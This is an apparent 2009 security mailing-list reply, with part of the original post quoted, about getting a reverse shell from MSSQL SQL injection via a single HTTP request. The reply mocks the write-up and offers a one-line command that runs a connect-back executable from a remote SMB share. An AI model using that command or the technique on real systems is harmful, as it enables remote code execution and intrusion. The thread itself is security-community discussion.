Ferruh,
The script host can be restricted to prevent this 'attack' Uploading
files to a windows host has been beaten to death, it's frankly insane
that you ever got booked for some security conference.
But yeah, the last ditch effort is always netbios, sometimes you even
have to modify the local
Or just
'start \\DiggleSec.com\fredrick\connectback.exe'
would have also been acceptable.
But Fredrick is sure that your 20 page write-up was fantastically entertaining.
On Fri, Jul 3, 2009 at 5:50 AM, Ferruh Mavitunafer...@mavituna.com wrote:
This is a different and more practical approach
This is a different and more practical approach to get a reverse shell
or code execution in SQL Injections (particularly in MSSQL). The idea
is simple. Getting a reverse shell from an SQL Injection with one HTTP
request without using an extra channel such as TFTP, FTP to upload the
initial